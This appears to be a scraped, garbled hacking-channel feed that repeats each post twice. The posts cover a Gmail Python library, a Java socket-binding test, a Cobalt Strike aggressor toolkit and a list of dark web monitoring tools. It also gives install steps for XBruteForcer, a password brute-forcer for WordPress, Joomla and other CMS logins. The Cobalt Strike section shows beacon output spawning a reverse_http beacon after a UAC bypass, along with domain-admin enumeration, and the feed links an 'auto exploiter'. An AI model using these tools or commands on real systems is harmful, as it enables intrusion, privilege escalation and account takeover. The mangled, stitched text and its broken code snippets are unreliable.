β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Pythonic interface to Google's GMail, with all the tools you'll need. Search, read and send multipart emails, archive, mark as read/unread, delete emails, and manage labels.
Search emails
Read emails
Emails: label, archive, delete, mark as read/unread/spam, star
Manage labels
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git://github.com/charlierguo/gmail.git
2) To start, import the gmail library.
import gmail
Authenticating gmail sessions
To easily get up and running:
import gmail
g = gmail.login(username, password)
Which will automatically log you into a GMail account. This is actually a shortcut for creating a new Gmail object:
from gmail import Gmail
g = Gmail()
g.login(username, password)
# play with your gmail...
g.logout()
You can also check if you are logged in at any time:
g = gmail.login(username, password)
g.logged_in # Should be True, AuthenticationError if login fails
OAuth authentication
If you have already received an OAuth2 access token from Google for a given user, you can easily log the user in. (Because OAuth 1.0 usage was deprecated in April 2012, this library does not currently support its usage)
gmail = gmail.authenticate(username, access_token)
Filtering emails
Get all messages in your inbox:
g.inbox().mail()
Get messages that fit some criteria:
g.inbox().mail(after=datetime.date(2013, 6, 18), before=datetime.date(2013, 8, 3))
g.inbox().mail(on=datetime.date(2009, 1, 1)
g.inbox().mail(sender="myfriend@gmail.com") # "from" is reserved, use "fr" or "sender"
g.inbox().mail(to="directlytome@gmail.com")
Combine flags and options:
g.inbox().mail(unread=True, sender="myboss@gmail.com")
Browsing labeled emails is similar to working with your inbox.
g.mailbox('Urgent').mail()
Every message in a conversation/thread will come as a separate message.
g.inbox().mail(unread=True, before=datetime.date(2013, 8, 3) sender="myboss@gmail.com")
Working with emails
Important: calls to mail() will return a list of empty email messages (with unique IDs). To work with labels, headers, subjects, and bodies, call fetch() on an individual message. You can call mail with prefetch=True, which will fetch the bodies automatically.
unread = g.inbox().mail(unread=True)
print unread[0].body
# None
unread[0].fetch()
print unread[0].body
# Dear ...,
Mark news past a certain date as read and archive it:
emails = g.inbox().mail(before=datetime.date(2013, 4, 18), sender="news@nbcnews.com")
for email in emails:
email.read() # can also unread(), delete(), spam(), or star()
email.archive()
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Pythonic interface to Google's GMail, with all the tools you'll need. Search, read and send multipart emails, archive, mark as read/unread, delete emails, and manage labels.
Search emails
Read emails
Emails: label, archive, delete, mark as read/unread/spam, star
Manage labels
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone git://github.com/charlierguo/gmail.git
2) To start, import the gmail library.
import gmail
Authenticating gmail sessions
To easily get up and running:
import gmail
g = gmail.login(username, password)
Which will automatically log you into a GMail account. This is actually a shortcut for creating a new Gmail object:
from gmail import Gmail
g = Gmail()
g.login(username, password)
# play with your gmail...
g.logout()
You can also check if you are logged in at any time:
g = gmail.login(username, password)
g.logged_in # Should be True, AuthenticationError if login fails
OAuth authentication
If you have already received an OAuth2 access token from Google for a given user, you can easily log the user in. (Because OAuth 1.0 usage was deprecated in April 2012, this library does not currently support its usage)
gmail = gmail.authenticate(username, access_token)
Filtering emails
Get all messages in your inbox:
g.inbox().mail()
Get messages that fit some criteria:
g.inbox().mail(after=datetime.date(2013, 6, 18), before=datetime.date(2013, 8, 3))
g.inbox().mail(on=datetime.date(2009, 1, 1)
g.inbox().mail(sender="myfriend@gmail.com") # "from" is reserved, use "fr" or "sender"
g.inbox().mail(to="directlytome@gmail.com")
Combine flags and options:
g.inbox().mail(unread=True, sender="myboss@gmail.com")
Browsing labeled emails is similar to working with your inbox.
g.mailbox('Urgent').mail()
Every message in a conversation/thread will come as a separate message.
g.inbox().mail(unread=True, before=datetime.date(2013, 8, 3) sender="myboss@gmail.com")
Working with emails
Important: calls to mail() will return a list of empty email messages (with unique IDs). To work with labels, headers, subjects, and bodies, call fetch() on an individual message. You can call mail with prefetch=True, which will fetch the bodies automatically.
unread = g.inbox().mail(unread=True)
print unread[0].body
# None
unread[0].fetch()
print unread[0].body
# Dear ...,
Mark news past a certain date as read and archive it:
emails = g.inbox().mail(before=datetime.date(2013, 4, 18), sender="news@nbcnews.com")
for email in emails:
email.read() # can also unread(), delete(), spam(), or star()
email.archive()
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When the server needs to be turned on during development, the local test is to write the port directly, and the actual environment also needs to specify the IP to be bonded.
Because for the server, sometimes it has more than one network card, and our system must communicate through the specified IP and port, so the IP and port used by the server need to define a configuration file.
π¦So in the usual test, without specifying the IP, where is the ServerSocket bound?
In this case, the server will bind this port to 0.0.0.0, that is, bind on all IPs, that is, receive requests on each IP. As for what 0.0.0.0 is, I won't talk about it here.
π¦The following is a test program, you can see what is going on through the following program:
package test;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
public class Test {
public static void main(String[] args) throws Exception {
SocketClient client = new SocketClient();
new Thread(client).start();
ServerSocket serverSocket = new ServerSocket();
serverSocket.bind(new InetSocketAddress(8888));
// serverSocket.bind(new InetSocketAddress("127.0.0.1",8888));
// serverSocket.bind(new InetSocketAddress("192.168.1.100",8888));
System.out.println(serverSocket.toString());
serverSocket.accept();
}
}
class SocketClient implements Runnable{
public void run() {
try {
Thread.sleep(2000);
try {
Socket socket = new Socket("127.0.0.1", 8888);
System.out.println("127.0.0.1 " + socket.toString());
} catch (Exception e) {
System.err.println("127.0.0.1'');
}
try {
Socket socket = new Socket("192.168.1.100", 8888);
System.out.println("192.168.1.100 " + socket.toString());
} catch (Exception e) {
System.err.println("192.168.1.100");
}
} catch (Exception e) {
e.printStackTrace();
}
}
}
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CobaltStrike toolkit:
Currently uses a PowerShell based check, combined with an aggressor script to check for the initial agent user name. While using .NET 3.5 to perform Domain Group enumeration (PowerShell 2+ safe). This allows for alerting on Pen-Test of a DA level beacons.
Β» Places a note on the beacon
Logs to the Event Log for team to see PID
uses a Pop up to alert opperator
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) clone https://github.com/killswitch-GUI/CobaltStrike-ToolKit
2) Run this with all the other scripts :
aggressor> load Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
when a Initial Beacon comes in:
aggressor> reload Initial-LAdminCheck.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/Initial-LAdminCheck.cna
If it returns as a Local Admin it will perform Bypass UAC:
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.1.198:80) in a high integrity process
[+] host called home, sent: 76304 bytes
3) load up the script
aggressor> load DA-Watch.cna
[+] Reload /root/Tools/CobaltStrike-ToolKit/DA-Watch.cna
Run this command and it will populate the known DA list
shell net group /domain "Domain Admins"
uaddDA - Command
Adds a user to the DA list
uremDA - Command
Removes a user from the DA list
ulistDA - Command
Prints a list of the current DA's to the Console
uhookOn
Sets the hook to follow beacon output to "On". This will watch all output for Shell net group...
uhookOff
Turns off the watch hook and set the follow beacon output to off.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - killswitch-GUI/CobaltStrike-ToolKit: Some useful scripts for CobaltStrike
Some useful scripts for CobaltStrike . Contribute to killswitch-GUI/CobaltStrike-ToolKit development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Here is our list of the 10 best dark web monitoring tools for network admins:
Echosec Beacon Checks the Dark Web for compromised account credentials, and stolen personal information and financial data.
SpyCloud ATO Prevention Account takeover prevention with a threat intelligence database derived from Dark Web scans.
Digital Shadows SearchLight A corporate brand protection service.
WhatsUp Gold A network traffic monitor that can identify traffic from the Tor network.
DigitalStakeout Scout A data loss prevention system and threat protection system that includes a Dark Web scanner.
Alert Logic Dark Web Scanner An account takeover prevention system based around a Dark Web scanner.
DarkOwl Vision A threat intelligence service that includes a Dark web scanner as an information source.
ACID Cyber Intelligence A threat intelligence service that scans all known sources of illegal data.
Dashlane Business A comprehensive password protection system that includes a Dark Web scanner.
Have I Been Pwned? A free email address-related Dark Web scan.
FOR BOT LINKS:
https://www.comparitech.com/net-admin/best-dark-web-monitoring-tools/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Here is our list of the 10 best dark web monitoring tools for network admins:
Echosec Beacon Checks the Dark Web for compromised account credentials, and stolen personal information and financial data.
SpyCloud ATO Prevention Account takeover prevention with a threat intelligence database derived from Dark Web scans.
Digital Shadows SearchLight A corporate brand protection service.
WhatsUp Gold A network traffic monitor that can identify traffic from the Tor network.
DigitalStakeout Scout A data loss prevention system and threat protection system that includes a Dark Web scanner.
Alert Logic Dark Web Scanner An account takeover prevention system based around a Dark Web scanner.
DarkOwl Vision A threat intelligence service that includes a Dark web scanner as an information source.
ACID Cyber Intelligence A threat intelligence service that scans all known sources of illegal data.
Dashlane Business A comprehensive password protection system that includes a Dark Web scanner.
Have I Been Pwned? A free email address-related Dark Web scan.
FOR BOT LINKS:
https://www.comparitech.com/net-admin/best-dark-web-monitoring-tools/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Comparitech
10 Best Dark Web Monitoring Tools for Network Admins in 2024
The Dark Web is reported to be a home for hackers and terrorists and it could pose a threat to your company. Find out what it is and how to block it.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Brute Forcer Tool π WordPress , Joomla , DruPal , OpenCart , Magento :
[1] WordPress (Auto Detect Username)
[2] Joomla
[3] DruPal
[4] OpenCart
[5] Magento
[6] All (Auto Detect CMS)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) FOR LINUX:
1) git clone https://github.com/Moham3dRiahi/XBruteForcer.git
2) cd XBruteForcer
3) perl XBruteForcer.pl -l list.txt -p passwords.txt
4) Installation Android alt tag
B) FOR Termux
cpan install LWP::UserAgent
cpan install HTTP::Request
git clone https://github.com/Moham3dRiahi/XBruteForcer.git
cd XBruteForcer
perl XBruteForcer.pl -l list.txt -p passwords.txt
C) Installation Windows alt tag
Download Perl
Download XBruteForcer
Extract XBruteForcer into Desktop
Open CMD and type the following commands:
cd Desktop/XBruteForcer-master/
perl XBruteForcer.pl -l list.txt -p passwords.txt
Version
VERIFIED
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦X Brute Forcer Tool π WordPress , Joomla , DruPal , OpenCart , Magento :
[1] WordPress (Auto Detect Username)
[2] Joomla
[3] DruPal
[4] OpenCart
[5] Magento
[6] All (Auto Detect CMS)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) FOR LINUX:
1) git clone https://github.com/Moham3dRiahi/XBruteForcer.git
2) cd XBruteForcer
3) perl XBruteForcer.pl -l list.txt -p passwords.txt
4) Installation Android alt tag
B) FOR Termux
cpan install LWP::UserAgent
cpan install HTTP::Request
git clone https://github.com/Moham3dRiahi/XBruteForcer.git
cd XBruteForcer
perl XBruteForcer.pl -l list.txt -p passwords.txt
C) Installation Windows alt tag
Download Perl
Download XBruteForcer
Extract XBruteForcer into Desktop
Open CMD and type the following commands:
cd Desktop/XBruteForcer-master/
perl XBruteForcer.pl -l list.txt -p passwords.txt
Version
VERIFIED
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
Moham3dRiahi/XAttackProV30
XAttacker Tool PRO V30 Website Vulnerability Scanner & Auto Exploiter - Moham3dRiahi/XAttackProV30